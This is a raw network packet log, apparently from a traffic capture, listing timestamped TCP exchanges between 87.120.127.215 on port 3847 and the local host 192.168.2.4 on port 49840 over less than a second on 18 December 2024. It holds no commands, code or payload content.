                                                                                                                                                Dec 18, 2024 19:27:20.530247927 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.581748009 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.666171074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.666218042 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.666279078 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.666724920 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.666975021 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.667196989 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.668095112 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.668131113 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.668184042 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.669169903 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.669207096 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.669255018 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.670222998 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.670265913 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.670320034 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.671351910 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.671446085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.672013044 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.672537088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.672703028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.672751904 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.673779011 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.673814058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.673865080 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.674781084 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.674932957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.674988031 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.675900936 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.676049948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.676666021 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.677217960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.677257061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.678356886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.678416967 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.678558111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.678611040 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.679666042 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.679727077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.679776907 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.680602074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.680744886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.680794954 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.681726933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.681817055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.683012009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.683064938 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.683093071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.683142900 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.684026003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.684258938 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.684314966 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.685218096 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.685307026 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.685360909 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.686337948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.686532021 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.687448978 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.687530041 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.687669039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.687719107 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.688671112 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.688766956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.688858032 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.689800024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.690001965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.690053940 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.691075087 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.691107988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.691160917 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.692158937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.692225933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.692279100 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.693294048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.693433046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.693517923 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.694565058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.694813013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.694864988 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.695710897 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.695924997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.695992947 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.696796894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.696913958 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.696965933 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.697981119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.698477030 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.698543072 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.699027061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.699199915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.699254990 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.700407028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.700443029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.700495958 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.701533079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.701570034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.701628923 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.702586889 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.702622890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.702703953 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.703766108 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.703800917 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.703926086 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.704982996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.705018997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.705071926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.706089020 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.706218958 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.706280947 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.707201958 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.707372904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.707446098 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.708353996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.708389044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.708441973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.709496975 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.709538937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.709660053 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.710621119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.710695028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.710746050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.711957932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.712033987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.712217093 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.712907076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.712992907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.713084936 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.714124918 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.714277029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.714329004 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.715327978 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.715521097 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.715569019 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.716447115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.716487885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.716541052 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.717560053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.717713118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.717780113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.718786955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.718919992 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.718974113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.719899893 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.720191956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.720714092 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.721075058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.721163988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.721219063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.722264051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.722419024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.722469091 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.723375082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.723440886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.723488092 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.724617004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.724704981 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.724891901 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.725683928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.725862026 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.725910902 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.726867914 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.769601107 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.858372927 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.858444929 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.858515978 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.858685017 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.859015942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.859030962 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.859074116 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.860224962 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.860241890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.860282898 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.861269951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.861310959 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.861459017 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.862555027 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.862588882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.862606049 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.863621950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.863715887 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.863763094 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.864865065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.864968061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.865025997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.866162062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.866198063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.866245031 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.867402077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.867439032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.867487907 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.868505955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.868541002 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.868555069 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.869488955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.869537115 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.869806051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.871074915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.871109009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.871153116 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.872046947 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.872081995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.872123003 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.872947931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.873034954 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.873055935 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.874454021 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.874488115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.874520063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.875384092 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.875418901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.875431061 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.876326084 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.876378059 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.876434088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.877635956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.877670050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.877672911 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.878690004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.878725052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.878739119 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.880052090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.880086899 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.880134106 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.881071091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.881124973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.881238937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.882313013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.882380009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.882559061 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.883384943 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.883445024 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.883512974 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.884378910 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.884499073 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.884514093 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.886059046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.886100054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.886153936 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.886850119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.886893034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.886909008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.887953997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.888050079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.888108969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.889764071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.889807940 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.889858007 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.890810013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.890846014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.890939951 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.891381979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.891437054 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.891472101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.893069029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.893104076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.893120050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.894309998 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.894344091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.894396067 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.894843102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.894896030 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.895268917 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.896011114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.896287918 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.896343946 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.897099018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.897258997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.897494078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.898668051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.898704052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.898720026 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.899501085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.899583101 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.899585962 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.901643038 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.901679993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.901696920 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.903218031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.903251886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.903278112 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.903290033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.903327942 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.903362989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.904182911 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.904230118 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.904561996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.905216932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.905500889 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.906002045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.906397104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.906450987 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.906568050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.907624006 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.907659054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.907681942 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.908915043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.908950090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.909137011 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.910007000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.910089016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.910144091 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.911132097 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.911190987 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.911372900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.912240982 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.912275076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.912282944 CET498403847192.168.2.487.120.127.215
